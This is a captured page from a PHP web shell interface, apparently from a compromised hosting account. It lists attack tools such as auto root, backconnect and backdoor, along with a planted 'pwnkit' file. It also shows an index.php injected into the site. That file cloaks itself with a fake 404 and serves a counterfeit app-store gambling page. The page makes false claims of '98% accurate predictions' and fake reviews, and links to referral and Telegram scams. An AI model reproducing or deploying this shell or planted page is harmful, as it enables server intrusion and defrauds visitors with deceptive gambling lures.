Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.145.115.139
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
manal /
horizon /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
googlea804df7de3538b2c.html
53
B
-rw-r--r--
index.php
25.46
KB
-rw-r--r--
list.txt
10.21
KB
-rw-r--r--
program.php
1.62
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
sitemap.xml
50.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php function feedback404() { header("HTTP/1.0 404 Not Found"); echo "<h1>404 Not Found</h1>"; echo "Nothing Here."; } if (isset($_GET['Barathum'])) { $filename = "list.txt"; $lines = file($filename, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $target_string = strtolower($_GET['Barathum']); foreach ($lines as $item) { if (strtolower($item) === $target_string) { $BRAND = strtoupper($target_string); } } if (isset($BRAND)) { $BRANDS = $BRAND; $protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http'; $fullUrl = $protocol . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; if (isset($fullUrl)) { $parsedUrl = parse_url($fullUrl); $scheme = isset($parsedUrl['scheme']) ? $parsedUrl['scheme'] : ''; $host = isset($parsedUrl['host']) ? $parsedUrl['host'] : ''; $path = isset($parsedUrl['path']) ? $parsedUrl['path'] : ''; $query = isset($parsedUrl['query']) ? $parsedUrl['query'] : ''; $baseUrl = $scheme . "://" . $host . $path . '?' . $query; $urlPath = $baseUrl; } else { echo "URL Can't Defined."; } } else { feedback404(); exit(); } } else { feedback404(); exit(); } /* *GANTI NAMA BRAND DENGAN INI <?php echo $BRANDS ?> * GANTI URL PATH DENGAN INI <?php echo $urlPath ?> * SAMA GANTI REDIRECT LOGIN/REGISTER */ ?> <!DOCTYPE html> <html lang="en-IN"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- Meta Tags for SEO --> <title id="main-title"><?php echo $BRANDS ?> | Spin now for instant wins and awesome rewards.</title> <meta name="description" content="wins at <?php echo $BRANDS ?>, just click there! Immerse yourself in endless excitement, win awesome prizes and unlock instant bonuses. Play it safe and make your dreams come true with every click - start now!"> <!-- Canonical and OG Tags --> <link rel="canonical" href="<?php echo $urlPath ?>"> <meta property="og:url" content="<?php echo $urlPath ?>"> <meta property="og:site_name" content="<?php echo $BRANDS ?>"> <meta property="og:title" content="<?php echo $BRANDS ?> | Spin now for instant wins and awesome rewards."> <meta property="og:description" content="wins at <?php echo $BRANDS ?>, just click there! Immerse yourself in endless excitement, win awesome prizes and unlock instant bonuses. Play it safe and make your dreams come true with every click - start now!"> <meta property="og:image" content="https://ik.imagekit.io/159753654852/indalottery.jpg?updatedAt=1727967867400"> <!-- Twitter Card Data --> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:site" content="@<?php echo $BRANDS ?>India"> <meta name="twitter:title" content="<?php echo $BRANDS ?> | Spin now for instant wins and awesome rewards."> <meta name="twitter:description" content="wins at <?php echo $BRANDS ?>, just click there! Immerse yourself in endless excitement, win awesome prizes and unlock instant bonuses. Play it safe and make your dreams come true with every click - start now!"> <meta name="twitter:image" content="https://ik.imagekit.io/159753654852/indalottery.jpg?updatedAt=1727967867400"> <!-- Language and Region --> <meta name="language" content="English"> <meta name="geo.region" content="IN"> <!-- Structured Data --> <script type="application/ld+json"> { "@context": "https://schema.org", "@type": "Organization", "name": "<?php echo $BRANDS ?>", "url": "<?php echo $urlPath ?>", "logo": "https://ik.imagekit.io/159753654852/indalottery.jpg?updatedAt=1727967867400", "description": "wins at <?php echo $BRANDS ?>, just click there! Immerse yourself in endless excitement, win awesome prizes and unlock instant bonuses. Play it safe and make your dreams come true with every click - start now!", "sameAs": [ "https://www.facebook.com/<?php echo $BRANDS ?>India", "https://twitter.com/<?php echo $BRANDS ?>India", "https://www.instagram.com/<?php echo $BRANDS ?>India" ] } </script> <style> :root { --main-color: #01875f; --main-hover-color: #01533b; } :root[data-type="google"] { --main-color: #01875f; --main-hover-color: #01533b; } html, body { width: 100%; height: 100%; } html, body, div, iframe, ul, li, p, h1, h2, h3, h4, h5, h6 { margin: 0; padding: 0; } ul, li { list-style: none; } h1, h2, h3, h4, h5, h6, em, strong, a { font-size: inherit; font-weight: inherit; font-style: inherit; font-family: inherit; } a { text-decoration: none; } button { background: none; border: none; } body { font-family: Roboto, Helvetica, Arial, sans-serif; font-size: 0.875rem; line-height: 1.25rem; color: #5f6368; } /* -------------------- */ .main-body { overflow: hidden; background: no-repeat center; background-size: cover; } .iframe-box { width: 100%; height: 100%; overflow: auto; border: none; } /* -------------------- */ .main-up, .information-list, .btn-box, .banner-imgs-box, .introduce { margin: 24px 24px 0; } /* */ .main-up { display: flex; align-items: center; } .main-up .logo { position: relative; width: 72px; height: 72px; margin-right: 24px; border-radius: 20%; } .main-up .logo.ami { overflow: hidden; } .main-up .logo img { display: block; width: 100%; } .main-up .logo .box, .loading-ci .box { display: none; position: absolute; left: 0; right: 0; top: 0; bottom: 0; border: 2px solid transparent; border-left: 2px solid var(--main-color); border-right: 2px solid var(--main-color); border-radius: 50%; animation: turn 1s linear infinite; transform-origin: 50% 50%; } @keyframes turn { 100% { transform: rotateZ(-1turn); } } .main-up .logo.ami img { width: 50%; margin: 18px auto; animation: all 0.3; } .main-up .logo.ami .box { display: block; } .main-up .info h1 { color: #202124; font-size: 22px; } .main-up .info h2 { margin-top: 5px; color: var(--main-color); font-size: 16px; } .main-up .info p { font-size: 12px; } /* */ .information-list { display: flex; align-items: center; } .information-list li { position: relative; flex: 1; text-align: center; } .information-list li img { width: 12px; } .information-list li img.large { width: 28px; } .information-list li strong { display: block; height: 28px; line-height: 28px; font-weight: 600; color: #202124; } .information-list li p { font-size: 12px; } .information-list li:before { background-color: rgb(232, 234, 237); content: ""; display: block; height: 24px; left: 0; position: absolute; top: calc(50% - 12px); width: 1px; } .information-list li:first-child:before { display: none; } /* */ .btn-box { position: relative; overflow: hidden; } .shiny:after { animation: shiny-btn-anim 4s ease-in-out infinite; background-color: #fff; content: ""; display: inline-block; height: 100%; left: 0; position: absolute; top: -180px; width: 30px; } @keyframes shiny-btn-anim { 0% { opacity: 0; transform: scale(0) rotate(45deg); } 80% { opacity: 0.5; transform: scale(0) rotate(45deg); } 81% { opacity: 1; transform: scale(4) rotate(45deg); } 100% { opacity: 0; transform: scale(50) rotate(45deg); } } .btn { display: block; width: 100%; padding: 10px 8px; background: var(--main-color); border-radius: 8px; color: #fff; cursor: pointer; } .btn.big { padding: 15px 8px; font-size: 18px; } .btn:hover { background: var(--main-hover-color); } .btn:disabled { opacity: 0.6; cursor: not-allowed; } .btn:disabled:hover { background: var(--main-color); } .btn:active { background: var(--main-color); } .btn .con { display: flex; flex-direction: column; } .btn .con p { display: flex; justify-content: center; margin-bottom: 3px; gap: 5px; font-size: 15px; color: #ffe336; } .btn .con img { width: 12px; } .btn+.btn { margin-top: 8px; } #installing { position: relative; width: 100%; background: none; border: var(--main-color) 1px solid; box-sizing: border-box; color: #ffe336; text-align: center; overflow: hidden; } #installing #proess { z-index: 0; position: absolute; left: 0; top: 0; height: 100%; background: var(--main-color); } #installing>* { z-index: 1; position: relative; } /* */ .banner-imgs-box { overflow-x: auto; overflow-y: hidden; } .banner-imgs { display: flex; flex-wrap: nowrap; width: fit-content; height: 224px; } .banner-imgs li { border-radius: 8px; height: 224px; margin-right: 11px; overflow: hidden; } .banner-imgs li img { display: block; height: 100%; } .banner-imgs-box.landscape .banner-imgs, .banner-imgs-box.landscape .banner-imgs li { height: 168px; } /* */ .introduce { padding-bottom: 16px; } .introduce h2 { margin-bottom: 20px; color: #202124; } .introduce>div { white-space: pre-wrap; } /* */ #loading, #reInstall, #play, #installing { display: none; } body[data-type="BEFORE_LOADING"] #loading { display: block; } body[data-type="BEFORE_LOADING"] #reInstall, body[data-type="BEFORE_LOADING"] #play, body[data-type="BEFORE_LOADING"] #installing { display: none; } body[data-type="LOADING"] #reInstall, body[data-type="INSTALL"] #reInstall { display: block; } body[data-type="LOADING"] #play, body[data-type="LOADING"] #installing, body[data-type="LOADING"] #loading, body[data-type="INSTALL"] #play, body[data-type="INSTALL"] #installing, body[data-type="INSTALL"] #loading { display: none; } body[data-type="PLAY"] #play { display: block; } body[data-type="PLAY"] #reInstall, body[data-type="PLAY"] #installing, body[data-type="PLAY"] #loading { display: none; } body[data-type="INSTALLING"] #installing { display: block; } body[data-type="INSTALLING"] #reInstall, body[data-type="INSTALLING"] #play, body[data-type="INSTALLING"] #loading { display: none; } /* */ .show-logo, .sold-out { width: 100%; height: 100%; display: flex; flex-direction: column; align-items: center; justify-content: center; } .show-logo img, .sold-out img { display: block; width: 80px; height: 80px; border-radius: 8px; } .show-logo p, .sold-out p { margin-top: 15px; font-weight: 600; } .show-img { display: block; width: 100%; height: 100%; object-fit: cover; } /* */ .show-btn, #pop-show, #loading-box { display: none; } #pop-show, #loading-box { z-index: 1000; position: fixed; left: 0; top: 0; width: 100vw; height: 100vh; } #pop-show .bd, #loading-box .bd { position: fixed; top: 50%; left: 50%; padding: 15px; transform: translate(-50%, -50%); background: #fff; border-radius: 10px; text-align: center; } #loading-box .bd { padding: 30px 50px; text-align: center; } #loading-box .bd p { margin: 15px 0 0; } #pop-show .bd { width: 70vw; } #pop-show .bd strong { display: flex; align-items: center; justify-content: center; gap: 5px; font-size: 20px; font-weight: 600; } #pop-show .bd p { display: inline-block; margin: 10px 0 0; padding: 0 10px; font-size: 14px; color: #666; border: #666 1px solid; border-radius: 3px; } #pop-show .bd .active-box { margin: 20px 0; } #pop-show .bd .active-box span { display: inline-flex; align-items: center; justify-content: center; gap: 5px; padding: 8px 20px; border-radius: 20px; background: rgba(119, 250, 73, 0.3); color: #01875f; font-weight: 600; font-size: 16px; } .mask { position: fixed; left: 0; top: 0; width: 100vw; height: 100vh; background: rgba(0, 0, 0, 0.5); } .loading-ci { display: flex; align-items: center; justify-content: center; position: relative; width: 72px; height: 72px; margin: 15px auto 0; color: #01875f; } .loading-ci .box { display: block; } .rotate { animation: loadingCircle 1s infinite linear; } @keyframes loadingCircle { 100% { transform: rotate(-360deg); } } /* -------------template---------------------- */ .template-head { position: fixed; top: 0; left: 0; width: 100%; z-index: 3; background-color: #fff; transition: box-shadow 0.2s ease-in-out; } .template-head.scroll { box-shadow: 0 4px 5px 0 rgba(0, 0, 0, 0.14), 0 1px 10px 0 rgba(0, 0, 0, 0.12), 0 2px 4px -1px rgba(0, 0, 0, 0.2); } .template-head .box { display: flex; justify-content: space-between; align-items: center; width: 100%; height: 56px; padding: 0 24px; box-sizing: border-box; } .template-head .box .l a { display: flex; align-items: center; font-size: 22px; color: rgb(95, 99, 104); font-family: "Google Sans", Roboto, Arial, sans-serif; gap: 8px; white-space: nowrap; } .template-head .box .l a svg { width: 40px; height: 40px; } .template-head .box .l img { width: 40px; height: 40px; } .template-head .box .r { display: flex; align-items: center; } .template-head .box .r a { display: flex; align-items: center; justify-content: center; width: 32px; height: 32px; padding: 8px; border-radius: 100%; transition: background 0.2s ease-in-out; } .template-head .box .r a:hover { background: #eee; } .template-footer { position: fixed; bottom: 0; left: 0; z-index: 3; width: 100%; height: 56px; background-color: #fff; border-top: 1px solid rgb(218, 220, 224); } .template-footer ul { display: flex; height: 56px; align-items: center; justify-content: center; } .template-footer ul li { flex: 1; text-align: center; overflow: hidden; } .template-footer ul span { display: block; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; } .template-footer ul li p { width: 24px; height: 24px; margin: 0 auto 2px; overflow: hidden; } .template-footer ul li a { color: rgb(95, 99, 104); } .template-footer ul li a:hover, .template-footer ul li.active a { color: var(--main-color); } .template-footer ul li a:hover img, .template-footer ul li.active a img { filter: drop-shadow(var(--main-color) 80px 0); border-left: 1px solid transparent; border-right: 1px solid transparent; transform: translateX(-80px); } .template-bd { padding: 56px 0; } .google-share-btns { margin-top: 15px; display: flex; align-items: center; justify-content: center; color: var(--main-color); gap: 20px; } .google-share-btns li { display: flex; align-items: center; gap: 8px; } .google-share-btns svg { fill: var(--main-color); } :root[data-type="google"] .banner-imgs-box { margin-top: 70px; } :root[data-type="google"] .introduce h2 { font-size: 18px; font-weight: bold; } :root[data-type="google"] .main-up .logo img { border-radius: 20%; box-shadow: 0 1px 2px 0 rgba(60, 64, 67, 0.3), 0 1px 3px 1px rgba(60, 64, 67, 0.15); } .update-box { margin: 24px 24px 0; } .update-box h3 { font-weight: bold; color: rgb(32, 33, 36); } .update-box p { margin-top: 4px; } .data-safety-list { margin: 20px 24px; border: rgb(218, 220, 224) 1px solid; border-radius: 8px; padding: 20px; } .data-safety-list li { display: flex; align-items: flex-start; } .data-safety-list li+li { margin-top: 20px; } .data-safety-list li img { margin-right: 20px; } .data-safety-list li p { font-size: 12px; } .data-safety-list li p span { text-decoration: underline; } .data-safety-list>p { margin-top: 20px; color: var(--main-color); } .banner-imgs-box { display: flex; justify-content: center; align-items: center; margin: 0 auto; padding: 20px; } .banner-imgs-box img { max-width: 100%; height: auto; } @media (min-width: 600px) { .banner-imgs-box img { width: 600px; height: 600px; } } </style> <!-- ios support --> <meta name="apple-mobile-web-app-status-bar" content="#aa7700"> <meta name="theme-color" content="#1976d2"> </head> <body data-type="INSTALL"> <div class="template-head"> <div class="box" onclick="javascript:DownSoft()"> <div class="l"> <a> <svg class="kOqhQd" aria-hidden="true" viewBox="0 0 40 40" xmlns="http://www.w3.org/2000/svg"> <path fill="none" d="M0,0h40v40H0V0z"></path> <g> <path d="M19.7,19.2L4.3,35.3c0,0,0,0,0,0c0.5,1.7,2.1,3,4,3c0.8,0,1.5-0.2,2.1-0.6l0,0l17.4-9.9L19.7,19.2z" fill="#EA4335"></path> <path d="M35.3,16.4L35.3,16.4l-7.5-4.3l-8.4,7.4l8.5,8.3l7.5-4.2c1.3-0.7,2.2-2.1,2.2-3.6C37.5,18.5,36.6,17.1,35.3,16.4z" fill="#FBBC04"></path> <path d="M4.3,4.7C4.2,5,4.2,5.4,4.2,5.8v28.5c0,0.4,0,0.7,0.1,1.1l16-15.7L4.3,4.7z" fill="#4285F4"></path> <path d="M19.8,20l8-7.9L10.5,2.3C9.9,1.9,9.1,1.7,8.3,1.7c-1.9,0-3.6,1.3-4,3c0,0,0,0,0,0L19.8,20z" fill="#34A853"></path> </g> </svg> <h1><?php echo $BRANDS ?></h1></a> </div> <div class="r"> <a> <img width="24" src="https://0uikhk89y8ex4pft-70760333567.shopifypreview.com/cdn/shop/files/help.svg" alt=""> </a> <a> <img width="24" src="https://0uikhk89y8ex4pft-70760333567.shopifypreview.com/cdn/shop/files/search.svg" alt=""></a> <a> <img src="https://0uikhk89y8ex4pft-70760333567.shopifypreview.com/cdn/shop/files/avatar.png" alt=""></a> </div> </div> </div> <div class="template-bd"> <div id="loading-box" style="display: none;"> <div class="mask"></div> <div class="bd"> <img width="45" class="rotate" src="https://0uikhk89y8ex4pft-70760333567.shopifypreview.com/cdn/shop/files/loading.svg"> <p>Loading...</p> </div> </div> <div id="pop-show"> <div class="mask"></div> <div class="bd"> <strong> <img src="https://0uikhk89y8ex4pft-70760333567.shopifypreview.com/cdn/shop/files/lightning.svg">Install</strong> <div class="loading-ci"> <div class="box"></div> <span id="count1">0</span>% </div> <div class="show-btn"> <div class="active-box"> <span><img src="https://0uikhk89y8ex4pft-70760333567.shopifypreview.com/cdn/shop/files/safe.svg">Effective</span> </div> <button class="btn big" id="click-btn">Install Now</button> </div> </div> </div> <div class="main-up"> <div class="logo"> <div class="box"></div> <img src="https://ik.imagekit.io/159753654852/indalottery.jpg?updatedAt=1727967867400" alt="<?php echo $BRANDS ?>"> </div> <div class="info"> <h1><?php echo $BRANDS ?> | Spin now for instant wins and awesome rewards.</h1> <h2 id="count2"><?php echo $BRANDS ?></h2> <p>Verified by Doffy</p> </div> </div> <ul class="information-list"> <li> <strong> 5.0⭐⭐⭐⭐⭐ </strong> <p>81455K reviews</p> </li> <li> <strong>24875K +</strong> <p>Downloads</p> </li> <li> <strong><img class="large" src="https://0uikhk89y8ex4pft-70760333567.shopifypreview.com/cdn/shop/files/18_1a3faef3-0a57-4e22-a7be-88ea94ffb7d8.svg"></strong> <p>Rated for 81926+</p> </li> </ul> <div class="btn-box shiny" onclick="javascript:DownSoft()"> <button id="loading" class="btn">Loading...</button> <a href="https://51game.app/#/register?invitationCode=16761100161"><button id="reInstall" class="btn">Register</button></a> <div id="installing" class="btn"> <div id="proess"></div> <span id="count">0</span><span>%</span> </div> <button id="play" onclick="playClick()" class="btn"> Play </button> </div> <div class="btn-box shiny" onclick="javascript:DownSoft()"></div> <button id="loading" class="btn">Loading...</button> <a href="https://t.me/+AC2HtB3-zLozOGNl"><button id="reInstall" class="btn">Join to Be Agent & Claim Free ₹2145</button></a> <div id="installing" class="btn"> <div id="proess"></div> <span id="count">0</span><span>%</span> </div> <button id="play" onclick="playClick()" class="btn"> Play </button> </div> <ul class="google-share-btns" onclick="javascript:DownSoft()"> <li> <svg class="f70z8e" width="24" height="24" viewBox="0 0 24 24"> <path d="M18 16.08c-.76 0-1.44.3-1.96.77L8.91 12.7c.05-.23.09-.46.09-.7s-.04-.47-.09-.7l7.05-4.11c.54.5 1.25.81 2.04.81 1.66 0 3-1.34 3-3s-1.34-3-3-3-3 1.34-3 3c0 .24.04.47.09.7L8.04 9.81C7.5 9.31 6.79 9 6 9c-1.66 0-3 1.34-3 3s1.34 3 3 3c.79 0 1.5-.31 2.04-.81l7.12 4.16c-.05.21-.08.43-.08.65 0 1.61 1.31 2.92 2.92 2.92 1.61 0 2.92-1.31 2.92-2.92s-1.31-2.92-2.92-2.92z"></path> </svg> <span>Share</span> </li> <li> <svg class="XkAcee" width="24" height="24" viewBox="0 0 24 24"> <path fill-rule="evenodd" clip-rule="evenodd" d="M7 3H17C18.1045 3 19 3.8955 19 5V21L12 18L5 21L5.01075 5C5.01075 3.8955 5.8965 3 7 3ZM12 15.824L17 18V5H7V18L12 15.824ZM13 7V9H15V11H13V13H11V11H9V9H11V7H13Z"></path> </svg> <span>Add to wishlist</span> </li> </ul> <div class="banner-imgs-box landscape"> <img src="https://ik.imagekit.io/159753654852/indalottery.jpg?updatedAt=1727967867400" alt="Banner Image"> </div> <div class="introduce"> <h2>About <?php echo $BRANDS ?></h2> <div><p>In the realm of lotteries, <a href="<?php echo $urlPath ?>"><?php echo $BRANDS ?></a> Join <?php echo $BRANDS ?>, India's most trusted lottery with up to 98% accurate predictions and easy big wins. If you are ready to claim your wealth, now is your chance to become rich!</p> <p><?php echo $BRANDS ?> offers you unlimited opportunities for online success. Don't hesitate to explore more ways to win because we know you are destined for awesome rewards. Your next big win could be just around the corner!</p> <p><?php echo $BRANDS ?> offers the best gambling experience with its advanced system and clear statistics. With 98% prediction accuracy, it increases your chances of winning and is the best platform for players looking for a good lottery strategy.</p> <p><?php echo $BRANDS ?> has a variety of fun games for players of all levels. Whether you are a beginner or a seasoned fan, the fair will delight you and give you the chance to win great prizes!</p></div> </div> <div class="update-box"> <h3>Updated on</h3> <p>2024-10-05</p> </div> <div class="introduce data-safety-box"> <h2>Data safety</h2> <p>Ensuring safety begins with a clear understanding of how developers collect and share your data. The data privacy and security practices implemented by developers may vary depending on the specific use of the app, your region, and your age.</p> </div> <div class="data-safety-list"> <ul> <li> <img src="https://0uikhk89y8ex4pft-70760333567.shopifypreview.com/cdn/shop/files/1.png" alt=""> <div> No data shared with third parties<p><span>Learn more</span> about how developers declare sharing</p> </div> </li> <li> <img src="https://0uikhk89y8ex4pft-70760333567.shopifypreview.com/cdn/shop/files/2.png" alt=""> <div> This app may collect these data types<p>Location, Personal info and 5 others</p> </div> </li> <li> <img src="https://0uikhk89y8ex4pft-70760333567.shopifypreview.com/cdn/shop/files/3.png" alt=""> <div>Data is encrypted in transit</div> </li> <li> <img src="https://0uikhk89y8ex4pft-70760333567.shopifypreview.com/cdn/shop/files/4.png" alt=""> <div>You can request that data be deleted</div> </li> </ul> <p onclick="javascript:DownSoft()">See details</p> </div> </div> </div> </body></html>
Close